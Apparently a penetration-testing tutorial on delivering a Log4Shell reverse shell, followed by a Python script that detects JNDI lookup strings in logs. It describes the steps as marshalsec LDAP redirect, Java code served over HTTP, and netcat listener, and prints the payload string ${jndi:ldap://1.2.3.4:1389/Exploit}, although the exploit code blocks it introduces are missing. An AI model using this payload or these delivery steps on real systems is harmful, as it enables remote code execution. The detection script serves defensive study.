Reverse shell
A simple Java exploit that pops a reverse shell (at least on Linux systems with a version of netcat that supports the -e switch) is:
Where 1.2.3.4 is the IP you’re catching the reverse shell at and 9999 is the port of the listener. This can be compiled with:
Note that the -source and -target flags may need to be modified depending on which version of Java the target is running. As with all things Java, the file name and the class name need to match.
Delivery with Log4Shell
Delivery through a vulnerable version of Log4j is done through a four-step process: malicious string → LDAP lookup → load Java code over HTTP → reverse shell.
A simple Java LDAP server that will handle redirects is available at https://github.com/mbechler/marshalsec. It can be built with Apache Maven using the version of OpenJDK supplied with Kali Linux:
Then run with:
Where $ATTACKER_IP and $ATTACKER_PORT are the IP address and port of an HTTP server that will be used to actually serve up the exploit.
Once that’s done you’ll just need to fire up a quick web server to serve appropriate exploit code (like the example reverse shell above) and a netcat listener, and then find a way to deliver the malicious string (${jndi:ldap://1.2.3.4:1389/Exploit}, where 1.2.3.4 is the $ATTACKER_IP above) somewhere it will be logged.
Note that a number of other protocols are supported besides LDAP (the marshalsec server supports a few).
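Seen from the defending side, the lookup string above is what ends up in the logs. The following added example (not code from the original page) scans log lines for it, matching any scheme rather than only LDAP, and extracts the callback host and port; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the lookup form shown above: ${jndi:<scheme>://<host>[:<port>]/<path>}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z][a-z0-9+.-]*)://"
    r"(?P<host>[^:/}\s]+)(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup string found in a log line."""
    # Access logs often store request fields percent-encoded, so decode first.
    decoded = unquote(line)
    hits = []
    for m in JNDI_RE.finditer(decoded):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "",
        })
    return hits

def scan(lines):
    """Yield (line_number, hit) for every lookup string in the input."""
    for n, line in enumerate(lines, 1):
        for hit in find_jndi_lookups(line):
            yield n, hit

# Constructed sample log lines (192.0.2.x and 198.51.100.x are documentation ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://192.0.2.10:1389/Exploit}"',
    '198.51.100.8 - - "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.11%3A1099%2Fobj%7D HTTP/1.1" 200 "-"',
    'INFO login failed for user ${jndi:dns://192.0.2.12/probe}',
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: {hit['scheme']}://{hit['host']}:{hit['port']}{hit['path']}")
```

A hit records that the string was logged, not that the lookup succeeded; the extracted host and port are the values to check against outbound connection logs from the same application host.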